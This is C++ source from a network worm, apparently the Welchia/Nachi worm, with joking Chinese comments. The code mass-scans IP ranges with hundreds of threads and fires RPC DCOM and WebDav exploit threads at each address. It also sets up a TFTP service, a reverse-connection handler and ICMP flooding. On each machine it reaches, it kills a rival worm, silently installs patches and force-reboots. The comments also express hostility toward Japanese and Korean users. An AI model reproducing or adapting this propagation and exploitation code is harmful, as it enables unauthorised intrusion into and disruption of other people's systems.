附3
BOOL DoServicePackFunction() { DWORD nSystemVer = Win2000OrXp(); if ( !( nSystemVer == 0 || nSystemVer == 1) ) return FALSE; // not 2k or xp if ( ReadRegServicePack(nSystemVer) ) return FALSE; //已经安装了 //识别语言版本 int nLanguageID; unsigned int unOemCP = GetOEMCP(); LCID lcid = GetSystemDefaultLCID(); WORD wMain = PRIMARYLANGID(lcid); WORD wSub = SUBLANGID(lcid); if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~ //管不了小欧洲~~ 俄罗斯牛人有自己的玩法 ~~ else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn nLanguageID = 1; //就是为这个来的~~ else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw nLanguageID = 2; //同胞骨肉的忙,一定要帮~~ else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp nLanguageID = -1; //偶好有干掉鬼子机器的冲动! //罢了,冤冤相报何时了~~~ 希望他丫的自新 ~~~ 再玩火就灭了他丫的~~ else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~ else{ nLanguageID = -1; } if ( nLanguageID == -1) return FALSE; char szServicePack[] = "RpcServicePack.exe"; // downlaod it~~~ if ( !nSystemVer ) { // 2k if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) ) return FALSE; } else{ if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) ) return FALSE; } char szExec[180]; sprintf(szExec, "%s -n -o -z -q", szServicePack); HANDLE hProcess = MakeProcess( szExec ); if ( hProcess == NULL ) return FALSE; if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内 未完成 TerminateProcess(hProcess,1); CloseHandle(hProcess); DeleteFile(szServicePack); return FALSE; } CloseHandle(hProcess); Sleep(15000); DeleteFile(szServicePack); if ( ReadRegServicePack(nSystemVer) ) { ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot it~~~ Sleep(20000); //说偶重启有过? 不重启补丁无效, 找 Bill该死 说去~~~ } return TRUE; } // IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~ void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL bWebDav) { HANDLE hThread = NULL; BOOL bFirst = TRUE; u_long uComp; for (int i=0;i< (nBCount * 256 * 256); i++){ if ( bRand ) uComp = MakeRandIp(); else uComp = i + ulIpStart; if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好 :)~~~ (BYTE)uComp == 0xc5 || (BYTE)(uComp>>8) == 0xc5 || (BYTE)(uComp>>16) == 0xc5 || (BYTE)(uComp>>24) == 0xc5 || (WORD)uComp == 0x9999 || (WORD)(uComp>>8) == 0x9999 || (WORD)(uComp>>16) == 0x9999 ) continue; u_long *myPara = new u_long; if ( myPara == NULL ){//如果分配失败,再尝试一次 Sleep(100); myPara = new u_long; } if ( myPara ){ if ( hThread ) CloseHandle(hThread); *myPara = htonl( uComp); DWORD dwThreadId; if (bWebDav) hThread = CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId); else hThread = CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId); Sleep(2); } //添加此处代码,避免首次执行时,线程中的 InterlockedIncrement(&g_CurThreadCount) 未来得及运行,一次性建立了N个线程的 bug! if ( bFirst && (i >= nMaxThread) ){ Sleep(2000); bFirst = FALSE; } while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心, 玩过了~~~ Sleep(2); } Sleep(60000); } //服务模式和控制台模式公用主程序 void DoIt() { WSADATAwsd; if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) return; //杀蠕虫 KillMsblast(); //卸载 SYSTEMTIME st; GetLocalTime(&st); if ( st.wYear == 2004 ){ MyDeleteService(szServiceName); MyDeleteService(szServiceTftpd); RemoveMe(); ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将 自身文件删除了 } srand( GetTickCount() ); memset(pPingBuffer, '/xAA', sizeof(pPingBuffer)); //烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补 丁已经打够了!~~~ //准备WebDav发送缓冲区 do{ pWebDavExploitBuffer = new char[68000]; Sleep(100); }while(pWebDavExploitBuffer == NULL); //必须在checkonlien 之前,一次装配好子弹 PressWebDavBufferOnce(); PressRpcDcomBufferOnce(); CheckOnlienAndPressData(); //get LocalIp & 修正子弹中的反向ip 和 端口 //打补丁 DoServicePackFunction(); //建立接收线程 DWORD dwThreadID; HANDLE hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L PVOID)NULL,0,&dwThreadID); if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之, 同时处理多个反连 return; CloseHandle(hWorkThread); if ( !MyStartService(szServiceTftpd) ){ Sleep(1000); InstallTftpService(); Sleep(1000); MyStartService(szServiceTftpd); } Sleep(2000); //等待接收线程中的全局 rand bind port u_long ulIP; for(;;){ //估算了一下,普通机器2小时一循环 //首先扫描本ip段 CheckOnlienAndPressData(); ulIP = ntohl(inet_addr(szLocalIp)); ulIP &= 0xffff0000; BeginExploitFunction( ulIP, 1, 0, 0); //再扫描本ip前后3个段 CheckOnlienAndPressData(); if ( rand() % 2) ulIP += 0x00010000; else ulIP -= 0x00030000; BeginExploitFunction( ulIP, 3, 0, 0); //再扫描WebDav一个段,跳出 135 syn封锁 CheckOnlienAndPressData(); ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~, 立即采取补救措施~~~ sorry~~~ BeginExploitFunction( ulIP, 1, 0, 1); //再扫描随机的IP, 数量1个 B段, rpc or webdav CheckOnlienAndPressData(); if ( rand() % 2) BeginExploitFunction( ulIP, 1, 1, 0); else BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~ KillMsblast(); } //WSACleanup(); }
